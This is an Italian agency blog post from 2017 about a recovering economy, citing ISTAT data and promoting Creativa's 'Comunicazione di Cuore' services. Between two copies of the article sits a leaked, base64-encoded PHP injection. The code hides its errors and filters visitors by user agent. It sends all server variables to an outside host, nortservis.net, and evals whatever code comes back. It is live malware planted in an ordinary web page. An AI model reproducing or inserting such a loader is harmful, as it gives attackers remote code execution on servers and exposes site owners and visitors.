Torna l'ottimismo, riparte la comunicazione... con tutto il cuore!

Data: 
11/09/2017

Nonostante un'estate ancora piena di disastri ambientali, dai terremoti agli uragani, e di buie minacce Coreane, l'andamento dell'economia italiana è positivo . I dati che ci arrivano dall'ISTAT raccontano un Paese che si trova "in un contesto di aumento delle profittabilità delle imprese e di intensificazione dell'attività di investimento. I consumi delle famiglie sono in moderato aumento, sostenuti da una riduzione consistente della propensione al risparmio. Migliora la fiducia dei consumatori e delle imprese e l'indicatore anticipatore segnala il proseguimento dell'attuale ritmo di crescita dell'attività economica".
Nello specifico nel trimestre novembre-gennaio l'indice della produzione industriale ha fatto segnare un +0,5 % rispetto al trimestre precedente , il comparto energia è cresciuto del 6,8 % , i beni durevoli dello 0,7 % e l'export è salito del 3,8 %. Per non parlare del boom nel turismo, mai così elevato.

Per l'ISTAT rimangono positive anche le prospettive per l'occupazione, con il tasso di disoccupazione sceso all'11,5 per cento , invertendo il sentiment dei consumatori: "l'indice del clima di fiducia dei consumatori è aumentato a seguito del miglioramento del clima economico e di quello futuro". .

Con questi segnali oggettivi di inversione di tendenza, è fondamentale per le imprese italiane, rprendere a comunicare, investire in visibilità, accellerare il processo di digitalizzazione ormai ineludibile.

Creativa è al fianco degli operatori di qualsiasi dimensione e settore, per accompagnarli con i valori della sua Comunicazione di Cuore: C come Competenza, U come Unicità, O come Operatività, R come Responsabilità, E come Efficacia. 5 punti fermi a disposizione delle imprese che intendono competere sui mercati nazionali ed esteri, affrontando i cambiamenti continui e puntando sull'innovazione.

Scegliete il cuore pulsante della comunicazione di Creativa per mettere in circolazione i vostro brand.

jsgfQ0KaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10gKSApIHsgaWYobWQ1KCRfUkVRVUVTVFsnZmRnZGZndnYnXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgJHBhdGNoZWRmdiA9ICJTREZERlNERiI7IH0gfQ0KDQppZigkcGF0Y2hlZGZ2ID09PSAiR0hLQVNNVkciICkgeyBAb2JfZW5kX2NsZWFuKCk7ICBkaWU7ICB9DQoNCmlmIChzdHJwb3MoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdLCAiV2luIiApID09PSBmYWxzZSkgeyAka2pka2VfYyA9IDE7IH0NCmVycm9yX3JlcG9ydGluZygwKTsNCmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsNCmdsb2JhbCAkaW5jbHVkZV90ZXN0OyAkaW5jbHVkZV90ZXN0ID0gMTsNCiRia2xqZz0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07DQokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOw0KaWYoICEoJF9HRVRbJ2RmJ10gPT09ICIyIikgYW5kICEoJF9QT1NUWydkbCddID09PSAiMiIgKSBhbmQgKChwcmVnX21hdGNoKCIvIiAuIGltcGxvZGUoInwiLCAkZ2hmanUpIC4gIi9pIiwgJGJrbGpnKSkgb3IgKEAkX0NPT0tJRVsnY29uZHRpb25zJ10pICBvciAoISRia2xqZykgb3IgKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSA9PT0gImh0dHA6Ly8iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICIxMjcuMC4wLjEiKSAgb3IgKCRfU0VSVkVSWydSRU1PVEVfQUREUiddID09PSAkX1NFUlZFUlsnU0VSVkVSX0FERFInXSkgb3IgKCRfR0VUWydkZiddID09PSAiMSIpIG9yICgkX1BPU1RbJ2RsJ10gPT09ICIxIiApKSkNCnt9DQplbHNlDQp7DQpmb3JlYWNoKCRfU0VSVkVSIGFzICRuZGJ2ID0+ICRjYmNkKSB7ICRkYXRhX25mZGguPSAiJlJFTV8iLiRuZGJ2LiI9JyIuYmFzZTY0X2VuY29kZSgkY2JjZCkuIiciO30NCiRjb250ZXh0X2poa2IgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoDQphcnJheSgnaHR0cCc9PmFycmF5KA0KICAgICAgICAgICAgICAgICAgICAgICAgJ3RpbWVvdXQnID0+ICcxNScsDQogICAgICAgICAgICAgICAgICAgICAgICAnaGVhZGVyJyA9PiAiVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIiwNCiAgICAgICAgICAgICAgICAgICAgICAgICdtZXRob2QnID0+ICdQT1NUJywNCiAgICAgICAgICAgICAgICAgICAgICAgICdjb250ZW50JyA9PiAiUkVNX1JFTT0nMSciLiRkYXRhX25mZGgNCikpKTsNCiR2a2Z1PWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vbm9ydHNlcnZpcy5uZXQvc2Vzc2lvbi5waHA/aWQiLCBmYWxzZSAsJGNvbnRleHRfamhrYik7DQppZigkdmtmdSkgeyBAZXZhbCgkdmtmdSk7IH0gZWxzZSB7b2Jfc3RhcnQoKTsgIGlmKCFAaGVhZGVyc19zZW50KCkpIHsgQHNldGNvb2tpZSgiY29uZHRpb25zIiwiMiIsdGltZSgpKzE3MjgwMCk7IH0gZWxzZSB7IGVjaG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsNCiB9DQoNCiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*457563643*/ ?>
Data: 
11/09/2017

Nonostante un'estate ancora piena di disastri ambientali, dai terremoti agli uragani, e di buie minacce Coreane, l'andamento dell'economia italiana è positivo . I dati che ci arrivano dall'ISTAT raccontano un Paese che si trova "in un contesto di aumento delle profittabilità delle imprese e di intensificazione dell'attività di investimento. I consumi delle famiglie sono in moderato aumento, sostenuti da una riduzione consistente della propensione al risparmio. Migliora la fiducia dei consumatori e delle imprese e l'indicatore anticipatore segnala il proseguimento dell'attuale ritmo di crescita dell'attività economica".
Nello specifico nel trimestre novembre-gennaio l'indice della produzione industriale ha fatto segnare un +0,5 % rispetto al trimestre precedente , il comparto energia è cresciuto del 6,8 % , i beni durevoli dello 0,7 % e l'export è salito del 3,8 %. Per non parlare del boom nel turismo, mai così elevato.

Per l'ISTAT rimangono positive anche le prospettive per l'occupazione, con il tasso di disoccupazione sceso all'11,5 per cento , invertendo il sentiment dei consumatori: "l'indice del clima di fiducia dei consumatori è aumentato a seguito del miglioramento del clima economico e di quello futuro". .

Con questi segnali oggettivi di inversione di tendenza, è fondamentale per le imprese italiane, rprendere a comunicare, investire in visibilità, accellerare il processo di digitalizzazione ormai ineludibile.

Creativa è al fianco degli operatori di qualsiasi dimensione e settore, per accompagnarli con i valori della sua Comunicazione di Cuore: C come Competenza, U come Unicità, O come Operatività, R come Responsabilità, E come Efficacia. 5 punti fermi a disposizione delle imprese che intendono competere sui mercati nazionali ed esteri, affrontando i cambiamenti continui e puntando sull'innovazione.

Scegliete il cuore pulsante della comunicazione di Creativa per mettere in circolazione i vostro brand.